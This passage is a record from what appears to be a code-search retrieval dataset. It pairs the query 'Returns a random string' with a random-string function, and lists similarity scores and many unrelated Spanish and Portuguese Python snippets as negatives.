return u_prev", "def mod_inverse_iterative(a, b):\n x, y, u, v = 0, 1, 1, 0\n while a != 0:\n q = int(b / a)\n r = b % a\n m = x - u * q\n n = y - v * q\n b, a, x, y, u, v = a, r, u, v, m, n\n return b, x, y", "def inverse(num, r):\n if int(num) == 0:\n return 0\n else:\n # Multiply with every number in the field and\n # check if the result is one. Easy Peasy!\n # Todo: Use Extended Euclidean Algo\n # or Logs/Anti-Logs\n for i in range(1, 256):\n if _multiply(num, i, r) == 1:\n return i", "def inverse(self):\n if self.field:\n # 1/(a+b√r) = (a-b√r)/((a+b√r)*(a-b√r)) = (a-b√r) / (a*a-b*b*r)\n d = self.a * self.a - self.b * self.b * self.r\n return Constructible(self.a / d, -self.b / d, self.field)\n else:\n # self is a rational\n return Constructible(1 / self.a)", "def __invert__(self) -> Seq:\n return self.reverse_complement()", "def inverse_transform(self, X, copy=...):\n ...", "def inv(a,b,c,d):\n\tdet = a*d-b*c\n\tm = lambda x: fractions.Fraction(x, det)\n\treturn map(str, map(m, [d, -b, -c, a]))", "def _inverse_lines(self):\n pass", "def inverse (x_ij):\n\n Hij = xyzrph2matrix (x_ij)\n Rji = Hij[0:3, 0:3]\n tij = Hij[0:3,3]\n Rij = Rji.transpose ()\n tji = -Rij.dot (tij)\n Hji = numpy.zeros ((4,4))\n Hji[0:3,0:3] = Rij\n Hji[0:3,3] = tji\n Hji[3,3] = 1\n return matrix2xyzrph (Hji)" ]
[ "0.7260351", "0.7015506", "0.69790083", "0.6911814", "0.6806856", "0.6755985", "0.6703932", "0.67010486", "0.66792345", "0.6677001", "0.6664742", "0.66548175", "0.6640481", "0.65897536", "0.65876037", "0.6559641", "0.6545105", "0.65431285", "0.6482718", "0.64756066", "0.6431034", "0.6425339", "0.6421494", "0.64213645", "0.6406834", "0.6405458", "0.63910156", "0.63891184", "0.63673955", "0.63574374", "0.63457555", "0.63456476", "0.6344105", "0.6336931", "0.6336293", "0.6331496", "0.6323322", "0.62827766", "0.6279394", "0.6270797", "0.6262053", "0.62391675", "0.62363774", "0.6234693", "0.6234693", "0.6234693", "0.6234693", "0.6234693", "0.6233078", "0.62238085", "0.62238085", "0.6223478", "0.6211482", "0.6200659", "0.61968267", "0.618654", "0.6183895", "0.61780775", "0.6164897", "0.61612624", "0.6125591", "0.6119571", "0.6115493", "0.61147815", "0.6076534", "0.6069131", "0.60527307", "0.60458195", "0.60175645", "0.6015168", "0.6010988", "0.5995689", "0.5994747", "0.59802175", "0.5975056", "0.5974407", "0.59743005", "0.59740597", "0.59685826", "0.5954536", "0.59478146", "0.5945289", "0.5944407", "0.59298193", "0.5926211", "0.59197044", "0.5919508", "0.5917468", "0.5902847", "0.5898587", "0.5890714", "0.5887707", "0.5885505", "0.5880958", "0.5873021", "0.587225", "0.586389", "0.5857672", "0.58466494", "0.5842775" ]
0.7615787
0
Returns a random string
def randString(largo=1):
    valores = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
    return ''.join(random.choice(valores) for i in range(largo))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def entrada_aluno(matricula):\n cod_curso = entrada_curso()\n print('> Em que ano, mês e dia você entrou na UFC? (YYYY-MM-DD)')\n data_de_ingresso = check.entrada('>>> ', check.data)\n print('> Em que data você vai concluir seu curso? (YYYY-MM-DD)')\n data_de_conclusao = check.entrada('>>> ', check.data)\n\n aluno = database.Aluno(matricula, data_de_conclusao,\n data_de_ingresso, cod_curso)\n return aluno", "def agregar_bolsa(self, letra, cantidad):", "def arroba_letras(cadena, long_palabra, costo_palabra_corta, costo_palabra_larga):\n palabras = cadena.split(\" \")\n frase_final = \"\"\n costo_total = 0\n for i in range(len(palabras)):\n if len(palabras[i]) > long_palabra:#verificio si la longitud de esa palabra cortada es menor a lo previamente establecido\n frase_final += palabras[i][0:long_palabra] + \"@ \" # corto la palabra en la posicion max y agrego un @\n costo_total += costo_palabra_corta\n if palabras[i][-1] == \".\": # veo si en la palabra corta cortada hay un punto y si lo lo borro y reemplazo por un STOP\n frase_final = frase_final.strip() + palabras[i].replace(palabras[i], \" STOP \")\n elif palabras[i][-1] == \".\": # veo si en la palabra larga cortada hay un punto y si lo hay lo borro y lo reemplazo por un STOP\n frase_final = frase_final.strip(\".\") + palabras[i].replace(palabras[i][-1], \" STOP \") \n else:\n frase_final += palabras[i] + \" \"\n costo_total += costo_palabra_larga\n frase_final += \"STOPSTOP\" \n \n return f\"\"\"El telegrama final es: \n{frase_final} \nutilizando {long_palabra} letras maximas por palabra a un costo de ${costo_total} \"\"\"", "def intercambiar_mayusculas_minusculas(cad):\n\n nueva_cad = \"\"\n\n for i in cad:\n if ord(i) < 64 or ord(i) > 122:\n nueva_cad = nueva_cad + i\n elif ord(i) < 97:\n nueva_cad = nueva_cad + chr(ord(i) + 32)\n else:\n nueva_cad = nueva_cad + chr(ord(i) - 32)\n\n print(nueva_cad)\n return nueva_cad", "def nuevaClave( self ) :\r\n liActual = [ columna.clave for columna in self.liColumnas if columna.siFormula ]\r\n numero = 1\r\n while True :\r\n clave = \"CALC_%d\"%numero\r\n if clave not in liActual :\r\n return clave\r\n numero += 1", "def orden_llegada(self, agenda):\n from django.db import connection\n with connection.cursor() as cursor:\n cursor.execute(\"\"\"\n select count(*) cantidad from agendamientos_agenda a\n join agendamientos_agendadetalle d on a.id = d.agenda_id\n where a.fecha = ?\n and medico_id = ?\n and turno_id = ? 
\"\"\", agenda.fecha, agenda.medico.id, agenda.turno.id)\n orden = cursor.fetchone()\n if not orden:\n orden = 0\n\n print(\"maximo orden \" + orden)\n\n return orden+1 # todo controlar que no sea mayor al máximo por médico", "def run(self):\n self.db.table('materia').insert([\n {\n 'nombre': 'Cálculo Diferencial e Integral',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'calculo-diferencial-e-integral',\n 'numeroUrl': 1891,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Estructuras de Datos',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'estructuras-de-datos',\n 'numeroUrl': 241,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Inglés Técnico 1',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'ingles-tecnico-1',\n 'numeroUrl': 665,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Teoría de la Computación 1',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'teoria-de-la-computacion-1',\n 'numeroUrl': 1865,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Programación Orientada a Objetos',\n 'ano': 2,\n 'cuatrimestre': 1,\n 'alias': 'programacion-orientada-a-objetos',\n 'numeroUrl': 246,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Ingeniería de Requerimientos',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'ingenieria-de-requerimientos',\n 'numeroUrl': 2006,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Métodos Computacionales para el Cálculo',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'métodos-computacionales-para-el-cálculo',\n 'numeroUrl': 2036,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Teoría de la Computación 2',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'teoría-de-la-computación-2',\n 'numeroUrl': 2013,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Arquitecturas y Organización de Computadoras 1',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'arquitecturas-y-organización-de-computadoras-1',\n 'numeroUrl': 2052,\n 'esRecursable': False,\n },\n {\n 'nombre': 'Programación Concurrente',\n 'ano': 2,\n 'cuatrimestre': 2,\n 'alias': 'programación-concurrente',\n 'numeroUrl': 2059,\n 'esRecursable': False,\n }\n ])", "def cliquer_sur_unité(self):", "def custo(EstadoRestaUm, resultante):\n return 1", "def representarArbolAutomatico(self):\n if not self.stepByStep:\n print(\"Pintar paredes en auto\")\n # Reinicio la matrix\n self.reiniciarMatrix()\n if self.arbol.raiz != None:\n # Capturo todos los valores\n for i in self.arbol.returnArbolComoVector():\n \n # Esta variable captura si se debe de pintar en x o y\n xy = int(i[1])\n cordenadas = i[0]\n print(\"===========NODOS DEL ARBOL=============\")\n print(i)\n print(\"===========NODOS DEL ARBOL=============\")\n # Se pinta en x o y?\n if xy == 0:\n self.crearParedX(int(cordenadas[0]), int(cordenadas[1]))\n else:\n self.crearParedY(int(cordenadas[0]), int(cordenadas[1]))\n\n self.esperarUnRato()\n\n print(\"========LISTO PARA PINTAR EL SIGUIENTE================\")\n \n else:\n print(\"Arbol vacio\")", "def agregar_al_atril(self):\n self.atril.append(self.bolsa.tomar_bolsa())", "def archivos_de_texto():\n palabra = \"\" \n palabras_candidatas = [] #lista donde se guardara las palabras candidatas de cada linea\n palabra_cantidad = {} #diccionario con la palabra candidata de clave y las veces que esta repetida en cada texto de valor\n with open(\"Cuentos.txt\",\"r\") as Cuentos: \n for linea_Cuentos in Cuentos: #cada ciclo del for es una linea del texto\n for caracter in linea_Cuentos: #cada ciclo del for es una caracter de la linea \n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter) #se transformas caracteres mayusculas y tildes\n 
palabra += caracter #cada caracter ira formando la palabra\n if not caracter.isalpha():\n if len(palabra) >= 5: #se analiza que la palabra tenga 5 o mas caracteres\n palabras_candidatas.append(palabra) \n palabra = \"\" #se vacia la palabra ya analizada\n for palabra_en_lista in palabras_candidatas: #se introduce las palabras candidatas a un diccionario\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [1,0,0]\n else:\n palabra_cantidad[palabra_en_lista] = [int(palabra_cantidad[palabra_en_lista][0]) + 1 , 0, 0]\n palabras_candidatas = []\n with open(\"La araña negra - tomo 1.txt\",\"r\") as La_arana_negra:#se repite el mismo proceso con los otros dos textos\n for linea_Cuentos in La_arana_negra:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,1,0]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] , int(palabra_cantidad[palabra_en_lista][1]) + 1, 0]\n palabras_candidatas = [] \n with open(\"Las 1000 Noches y 1 Noche.txt\",\"r\") as muchas_noches: \n for linea_Cuentos in muchas_noches:\n for caracter in linea_Cuentos:\n if caracter.isalpha():\n caracter = quitar_tilde_y_may(caracter)\n palabra += caracter\n if not caracter.isalpha():\n if len(palabra) >= 5:\n palabras_candidatas.append(palabra)\n palabra = \"\"\n for palabra_en_lista in palabras_candidatas:\n if palabra_en_lista not in palabra_cantidad:\n palabra_cantidad[palabra_en_lista] = [0,0,1]\n else:\n palabra_cantidad[palabra_en_lista] = [palabra_cantidad[palabra_en_lista][0] ,palabra_cantidad[palabra_en_lista][1], int(palabra_cantidad[palabra_en_lista][2]) + 1]\n palabras_candidatas = [] \n palabra_cantidad = dict(sorted(palabra_cantidad.items())) #se ordena el diccionario alfabeticamente\n with open(\"palabras.csv\",\"w\") as palabras_csv: # se agrga el diccionario a un arcivo .csv\n for palabra in palabra_cantidad:\n palabras_csv.write(palabra)\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][0]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][1]))\n palabras_csv.write(\",\")\n palabras_csv.write(str(palabra_cantidad[palabra][2]))\n palabras_csv.write(\"\\n\")\n return palabra_cantidad", "def gen_azon():\n # Le kell kerdeznunk, hogy milyen ID-k vannak hasznalatban\n conn = get_db()\n try:\n cur = conn.cursor()\n try:\n # Lekerdezzuk az osszes order_id-t\n cur.execute(\"SELECT order_id FROM orders\")\n # Itt taroljuk a jelenlegi legnagyobb order_id-t \n # (annak csak az utolso 6 betujet fogjuk vizsgalni)\n biggestvalue = 0\n # Vegigiteralunk az eredmenytablan, es minden order_id-ra\n # megnezzuk hogy az utolso 6 szamjegye nagyobb e mint a biggestValue.\n # Ha az ID-k kozott lenne 2016/ kezdetu is, nem lesz gond, hiszen a \n # vizsgalat soran nem teszunk kulonbseget a kulonbozo evek kozott, igy \n # az osszes evhez kepest egyedi ID jon letre, melyet 2017-kent regisztralunk majd.\n for order_id in cur:\n actualvalue = int(order_id[-6:])\n if actualvalue > biggestvalue:\n biggestvalue = actualvalue\n # A ciklus vegere a biggestValue a legnagyobb order_id ertekkel lesz egyenlo,\n # igy ezt novelve mar biztos hogy egyedi erteket kapunk\n biggestvalue = biggestvalue + 1\n # Az uj ID ele 
2017/-es elotagot teszunk\n order_id = '2017/'+str(biggestValue)\n return jsonify({\"order_id\": order_id})\n finally:\n cur.close()\n finally:\n conn.close()", "def criaColuns():\n\n #Preencher Colunas\n numColunsVaz = 5\n numColuns = 2\n coluns = \"\"\n\n while(numColuns > 0): #preenchendo colunas de linha\n while(numColunsVaz > 0): #preenchendo espacos vazios das colunas de cada linha\n coluns += \" \"\n numColunsVaz -= 1\n\n coluns += \"|\"\n numColunsVaz = 5\n numColuns -= 1\n\n coluns += \" \"\n print(espacamento ,coluns ,espacamento)", "def __cacula_agio(table):\n from m2py.misc.vectorize import column\n\n PV = table[0][-1]\n total = sum(column(table, 1))\n premium = total/PV - 1\n return round(premium, 2)", "def mezclar_bolsa(self):", "def mostraCotxe(self):\n return str(self._l[0])+\" \"+str(self._l[1])+\" \"+str(self._l[2])+\" \"+str(self._l[3])", "def girar_aleatorio(self):\n for i in range(len(self.ativo_horas)):\n self.ativo_horas[i] = randint(0, 1)", "def verElArbol(self):\n ventanaEmergente = Toplevel()\n ventanaEmergente.title(\"Arbol\")\n ventanaEmergente.geometry(\"640x500\")\n tela = Canvas(ventanaEmergente, height=500, width=640, bg = \"snow\")\n\n # Capturo los nodos del arbol\n for i in self.arbol.returnXYDeNodos():\n # Pinto un circulo\n tela.create_oval(i[0], i[1], i[0]+55, i[1]+55)\n # SE pinta la leyenda\n tela.create_text(i[0]+24, i[1]+20, text=str(i[2]))\n\n tela.place(x=0, y=0)", "def solicita_adelanto(self, sistema, operacion, medio_de_almacenamiento):\r\n\r\n primeros_cola_r_a = operacion.recurso.cola[0:operacion.recurso.capacity]\r\n primeros_cola_m_a = medio_de_almacenamiento.cola[0:medio_de_almacenamiento.espacios_de_atencion]\r\n\r\n primeros_cola_r_a_disponen_p_e = \\\r\n all(camion.dispone_producto_espacio_medios_almacenamiento(sistema)\r\n for camion in primeros_cola_r_a)\r\n\r\n primeros_cola_m_a_disponen_p_e = \\\r\n all(camion.dispone_producto_espacio_medio_almacenamiento(medio_de_almacenamiento) # TODO rev. 
posibles bugs\r\n for camion in primeros_cola_m_a)\r\n\r\n primeros_cola_r_a_entre_primeros_colas_m_a = \\\r\n all(camion.entre_primeros_colas_medios_almacenamiento(sistema)\r\n for camion in primeros_cola_r_a)\r\n\r\n if operacion.nombre == \"Transbordo en sistema mecanizado\":\r\n pass\r\n\r\n elif self.dispone_producto_espacio_medio_almacenamiento(medio_de_almacenamiento):\r\n\r\n if self.nombre == 9:\r\n print primeros_cola_m_a\r\n\r\n if self.entre_primeros_cola_medio_de_almacenamiento(medio_de_almacenamiento) \\\r\n and (not primeros_cola_r_a_disponen_p_e or not primeros_cola_r_a_entre_primeros_colas_m_a):\r\n primeros_cola_r_a[operacion.recurso.count].adelanta_camion(\r\n sistema, operacion, medio_de_almacenamiento, self, \"Operacion\")\r\n\r\n if self.entre_primeros_cola_recurso(operacion.recurso) and not primeros_cola_m_a_disponen_p_e:\r\n\r\n primeros_cola_m_a[medio_de_almacenamiento.espacios_en_uso].adelanta_camion(\r\n sistema, operacion, medio_de_almacenamiento, self, \"Almacen\")", "def escolher_posicao_auto(tab, jog, str1):\r\n if not eh_tabuleiro(tab) or not (jog in [-1,1] and type(jog)==int) or not (str1 in ['basico','normal','perfeito'] and type(str1)==str):\r\n raise ValueError('escolher_posicao_auto: algum dos argumentos e invalido') \r\n else:\r\n \r\n #vitoria_1: tabuleiro X inteiro -> posicao\r\n \r\n def vitoria_1(tab,jog):\r\n \"\"\"\r\n vitoria_1 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o jogador tiver duas\r\n das suas pecas em linha e uma posicao livre entao retorna essa posicao livre.\r\n \"\"\"\r\n for i in range(1,4):\r\n win = [(0,jog,jog), (jog,0,jog), (jog,jog,0)]\r\n coluna = obter_coluna(tab, i)\r\n linha = obter_linha(tab, i) \r\n if coluna in win:\r\n return i+3*win.index(coluna)\r\n elif linha in win:\r\n return 3*i-2+win.index(linha) \r\n if i!=3:\r\n diagonal = obter_diagonal(tab, i)\r\n if diagonal in win:\r\n if i==1:\r\n return i+4*win.index(diagonal)\r\n\r\n else:\r\n return 7-2*win.index(diagonal)\r\n \r\n #bloqueio_2: tabuleiro X inteiro -> posicao \r\n \r\n def bloqueio_2(tab,jog):\r\n \"\"\"\r\n bloqueio_2 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o adversario tiver duas\r\n das suas pecas em linha e uma posicao livre entao retorna essa posicao livre.\r\n \"\"\"\r\n jog*=-1\r\n return vitoria_1(tab,jog) \r\n \r\n #bifurcacao_3: tabuleiro X inteiro -> lista de posicoes\r\n \r\n def bifurcacao_3(tab, jog):\r\n \"\"\"\r\n bifurcacao_3 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o jogador tiver duas\r\n linhas/colunas/diagonais que se intersectam, onde cada uma contem uma das\r\n suas pecas entao retorna uma lista com todas as posicoes de intersecao \r\n (criando duas formas de vencer na jogada seguinte).\r\n \"\"\"\r\n pos = []\r\n for i in range(1,4):\r\n for j in range(1,4):\r\n if obter_coluna(tab,i).count(jog)==1 and obter_linha(tab,j).count(jog)==1 and eh_posicao_livre(tab, i+3*j-3):\r\n pos+=[i+3*j-3]\r\n for k in range(1,3):\r\n if k==1:\r\n if obter_coluna(tab,i).count(jog)==1 and obter_diagonal(tab,1).count(jog)==1 and eh_posicao_livre(tab, 1+4*(i-1)):\r\n pos+=[1+4*(i-1)]\r\n if obter_linha(tab,j).count(jog)==1 and obter_diagonal(tab,1).count(jog)==1 and eh_posicao_livre(tab, 1+4*(i-1)):\r\n pos+=[1+4*(i-1)]\r\n if obter_diagonal(tab,1).count(jog)==1 and obter_diagonal(tab,2).count(jog)==1 and eh_posicao_livre(tab, 
5):\r\n pos+=[5]\r\n if k==2:\r\n if obter_coluna(tab,i).count(jog)==1 and obter_diagonal(tab,1).count(jog)==1 and eh_posicao_livre(tab, 7-2*(i-1)):\r\n pos+=[7-2*(i-1)]\r\n if obter_linha(tab,j).count(jog)==1 and obter_diagonal(tab,1).count(jog)==1 and eh_posicao_livre(tab, 3+2*(i-1)):\r\n pos+=[3+2*(i-1)] \r\n return pos\r\n \r\n #bloqueio_de_bifurcacao_4: tabuleiro X inteiro -> posicao\r\n \r\n def bloqueio_de_bifurcacao_4(tab,jog): \r\n \"\"\"\r\n bloqueio_de_bifurcacao_4 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o adversario tiver apenas uma bifurcacao\r\n entao retorna a posicao de bloqueio dessa bifurcacao, caso contrario, retorna a posicao\r\n em que se cria um dois em linha para forcar o oponente a defender, desde que a defesa nao\r\n resulte na criacao de uma bifurcacao para o oponente.\r\n \"\"\" \r\n if len(bifurcacao_3(tab,-1*jog)) == 1 :\r\n return bifurcacao_3(tab,-1*jog)[0]\r\n else:\r\n for i in range(1,4):\r\n if obter_coluna(tab,i).count(jog)==1:\r\n col = obter_coluna(tab,i)\r\n for j in range(3):\r\n if col[j]==0:\r\n pos1=3*j+i\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n \r\n if obter_linha(tab,i).count(jog)==1:\r\n linha = obter_linha(tab,i)\r\n for j in range(3):\r\n if linha[j]==0:\r\n pos1=j+1+3*(i-1)\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n \r\n if i < 3 and obter_diagonal(tab,i).count(jog)==1:\r\n diagonal = obter_diagonal(tab,i)\r\n for j in range(3):\r\n if i==1:\r\n if diagonal[j]==0:\r\n pos1=4*j+i\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1\r\n else:\r\n if diagonal[j]==0:\r\n pos1=7-2*j\r\n newtab = marcar_posicao(tab, jog, pos1)\r\n if len(bifurcacao_3(newtab,-1*jog)) == 0:\r\n return pos1 \r\n \r\n #centro_5: tabuleiro X inteiro -> posicao\r\n \r\n def centro_5(tab, jog):\r\n \"\"\"\r\n centro_5 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e devolve a posicao\r\n central (5) no caso da mesma estar livre.\r\n \"\"\"\r\n if eh_posicao_livre(tab, 5):\r\n return 5\r\n \r\n #canto_oposto_6: tabuleiro X inteiro -> posicao\r\n \r\n def canto_oposto_6(tab, jog):\r\n \"\"\"\r\n canto_oposto_6 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se o adversario estiver num\r\n canto e se o canto diagonalmente oposto for uma posicao livre entao\r\n retorna a posicao desse canto oposto.\r\n \"\"\"\r\n jog*=-1\r\n if obter_linha(tab,1)[0]==jog and eh_posicao_livre(tab,9):\r\n return 9\r\n if obter_linha(tab,1)[2]==jog and eh_posicao_livre(tab,7):\r\n return 7\r\n if obter_linha(tab,3)[0]==jog and eh_posicao_livre(tab,3):\r\n return 3\r\n if obter_linha(tab,3)[2]==jog and eh_posicao_livre(tab,1):\r\n return 1 \r\n \r\n #canto_vazio_7: tabuleiro X inteiro -> posicao\r\n \r\n def canto_vazio_7(tab, jog):\r\n \"\"\"\r\n canto_vazio_7 recebe um tabuleiro e um inteiro correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se um canto for uma posicao\r\n livre entao devolve a posicao correspondente a esse canto.\r\n \"\"\"\r\n for x in [1,3,7,9]:\r\n if eh_posicao_livre(tab,x):\r\n return x \r\n \r\n #lateral_vazio_8: tabuleiro X inteiro -> posicao\r\n \r\n def lateral_vazio_8(tab, jog):\r\n \"\"\"\r\n lateral_vazio_8 recebe um tabuleiro e um inteiro 
correspondente ao jogador \r\n (1 para o jogador 'X' e -1 para o jogador 'O') e se uma posicao lateral\r\n (que nem e o centro, nem um canto) for livre, entao retorna a posicao\r\n correspondente a essa posicao lateral.\r\n \"\"\"\r\n for x in [2,4,6,8]:\r\n if eh_posicao_livre(tab,x):\r\n return x \r\n \r\n if str1=='basico':\r\n for i in range(2):\r\n if i==0: res = centro_5(tab, jog)\r\n if i==1: res = canto_vazio_7(tab, jog)\r\n if res!=None:\r\n return res\r\n return lateral_vazio_8(tab, jog) \r\n \r\n \r\n elif str1=='normal':\r\n for i in range(5):\r\n if i==0: res = vitoria_1(tab,jog)\r\n if i==1: res = bloqueio_2(tab,jog)\r\n if i==2: res = centro_5(tab, jog)\r\n if i==3: res = canto_oposto_6(tab, jog)\r\n if i==4: res = canto_vazio_7(tab, jog)\r\n if res!=None:\r\n return res\r\n return lateral_vazio_8(tab, jog)\r\n \r\n \r\n elif str1=='perfeito':\r\n for i in range(7):\r\n if i==0: res = vitoria_1(tab,jog)\r\n if i==1: res = bloqueio_2(tab,jog)\r\n if i==2: \r\n res = bifurcacao_3(tab, jog)\r\n if res!=[]:\r\n res = bifurcacao_3(tab, jog)[0]\r\n else:\r\n res=None\r\n if i==3: \r\n res = bloqueio_de_bifurcacao_4(tab,jog)\r\n if res!=[]:\r\n res = bloqueio_de_bifurcacao_4(tab,jog)\r\n else:\r\n res=None \r\n if i==4: res = centro_5(tab, jog)\r\n if i==5: res = canto_oposto_6(tab, jog)\r\n if i==6: res = canto_vazio_7(tab, jog)\r\n if res!=None:\r\n return res\r\n return lateral_vazio_8(tab, jog)", "def entero(self):\n return int(\"\".join(self.binario), 2)", "def obtenerObra(self):\n rowActual = self.tableOs.currentItem().row()\n self.lineRazon.setText(str(self.tableOs.item(rowActual,0).text()))\n self.lineRazon.setEnabled(False)\n self.obraSocial=str(self.tableOs.item(rowActual,0).text())\n self.lineCuit.setText(str(self.tableOs.item(rowActual,1).text()))\n self.lineCuit.setEnabled(False)\n self.tableOs.setEnabled(False)\n self.gbFactura.setEnabled(True)\n self.gbNotaCredito.setEnabled(True)", "def reemplaza_tildes(palabra):", "def obtener_adyacente_aleatorio (self,v):\n return choice(list(self.vertices[v].keys()))", "def comando(accion,_):\r\n return array_comandos", "def cria_carro_ford(self):\n\n self.total_de_carros_ford += 1\n print(\"Carro Ford #\", self.total_de_carros_ford, \" criado\")", "def cambiar_escena(self, escena):\n\t\t# Reemplazo directo\n\t\tself.escena = escena\n\t\t# Reiniciar la ventana con el tamaño de la nueva escena\n\t\tprint(\"Iniciando nuevo contexto OpenGL...\")\n\t\tv_ancho, v_alto = escena.tam\n\t\topciones = OPENGL | DOUBLEBUF\n\t\tif escena.pant_compl:\n\t\t\topciones |= FULLSCREEN\n\t\tpygame.display.set_mode((v_ancho, v_alto), opciones)\n\t\t# Título por defecto de la ventana\n\t\tpygame.display.set_caption(escena.nombre)\n\t\t# Reiniciar OpenGL\n\t\tself.gl_ini(v_ancho, v_alto)\n\t\t# Darle los datos del núcleo a la ventana\n\t\tself.escena.nucleo = self\n\t\tself.escena.eventos = self.mapa_eve\n\t\tglClearColor(*escena.color)\n\t\t# Ejecutar la lógica inicial de la escena\n\t\tprint(\"Iniciando escena...\")\n\t\tself.escena.logica_ini()", "def carregarAluno(self, matricula):\r\n try:\r\n self.__id = int(matricula)\r\n self.cursor.execute(\"SELECT * FROM ALUNO WHERE MATRICULA = %s;\" %(self.__id))\r\n if self.cursor.rowcount == 1:\r\n return self.cursor.fetchone()\r\n else:\r\n return None\r\n except:\r\n return None", "def maketableau(alphabet):\n return TabulaRecta(alphabet, ct=alphabet[::-1], keys=alphabet[::-1])", "def crear_mapa (self, ancho = 40 , largo = 40):\n\n for i in range (largo):\n\n a = \" \"\n b = []\n for z in range 
(ancho):\n b.append(a)\n kasino.mapa.append(b)\n\n for i in range (1,ancho -1):\n kasino.mapa[0][i]=\"═══\"\n kasino.mapa[largo-1][i]=\"═══\"\n\n for i in range (1,largo -1):\n kasino.mapa[i][0]= \" ║\"\n kasino.mapa[i][ancho-1]= \"║\"\n \n kasino.mapa [0][0]=\" ╔\"\n kasino.mapa [0][ancho-1]=\"╗\"\n kasino.mapa [largo-1][0]=\" ╚\"\n kasino.mapa [largo-1][ancho-1]=\"╝\"", "def limpiarVentana(self):\n self.limpiarTabla(self.tableFactura)\n self.lineNumero.setEnabled(True)\n self.lineNumero.clear()\n self.limpiarTabla(self.tableNC)", "def andar(self, nome, comando):\n sai = json.loads(self.orm.get_mapa(self.orm.get_global(nome).local).saidas)\n if comando not in sai.keys():\n return 'esse local nao existe! nao o enchergo daqui...'\n\n self.orm.update_global(nome, local=sai[comando])\n irs = self.orm.get_mapa(self.orm.get_global(nome).local).nome_amigavel.split('|')[0]\n return f'voçê foi para {irs}'", "def matriculaAlParking(placa):\n con = lite.connect('parking.db')\n cur = con.cursor()\n try:\n cur.execute(\"SELECT id_cotxe FROM parking WHERE placa=?;\",(placa,))\n row = cur.fetchone()\n if row:\n print \"En la Posicio\", placa, \" hi ha el cotxe amb matricula\", row[0]\n else:\n print \"La plaça\", placa,\"esta buida.\"\n except:\n pass\n con.close()", "def crear_dicionarios():\r\n valor_alfanumerico = {'a': 1, 'b': 2, 'c': 3, 'd': 4, 'e': 5, 'f': 6, 'g': 7, 'h': 8, 'i': 9, 'j': 10, 'k': 11, 'l': 12,\r\n 'm': 13, 'n': 14, 'ñ': 15, 'o': 16, 'p': 17, 'q': 18, 'r': 19, 's': 20, 't': 21, 'u': 22, 'v': 23, 'w': 24, 'x': 25, 'y': 26,\r\n 'z': 27, 'A': 28, 'B': 29, 'C': 30, 'D': 31, 'E': 32, 'F': 33, 'G': 34, 'H': 35, 'I': 36, 'J': 37, 'K': 38, 'L': 39, 'M': 40,\r\n 'N': 41, 'Ñ': 42, 'O': 43, 'P': 44, 'Q': 45, 'R': 46, 'S': 47, 'T': 48, 'U': 49, 'V': 50, 'W': 51, 'X': 52, 'Y': 53, 'Z': 54,\r\n 'á': 55, 'Á': 56, 'é': 57, 'É': 58, 'í': 59, 'Í': 60, 'ó': 61, 'Ó': 62, 'ú': 63, 'Ú': 64, '/': 65, '(': 66, ')': 67, '\"': 68,\r\n '=': 69, '&': 70, '%': 71, '$': 72, '#': 73, '!': 74, '¡': 75, '¿': 76, '?': 77, '*': 78, '-': 79, '+': 80, \"'\": 81, '0': 82,\r\n '1': 83, '2': 84, '3': 85, '4': 86, '5': 87, '6': 88, '7': 89, '8': 90, '9': 91, '|': 92, '°': 93, '<': 94, '>': 95, '{': 96,\r\n '}': 97, '[': 98, ']': 99, ',': 100, '.': 101, ':': 102, ';': 103, '_': 104, '^': 105, '`': 106, '~': 107, '¬': 108, ' ': 109}\r\n return valor_alfanumerico", "def addAluno(self, dados, situacao, login, turma):\r\n try:\r\n self.cursor.execute(\"INSERT INTO ALUNO(MATRICULA, DADOS, SITUACAO, 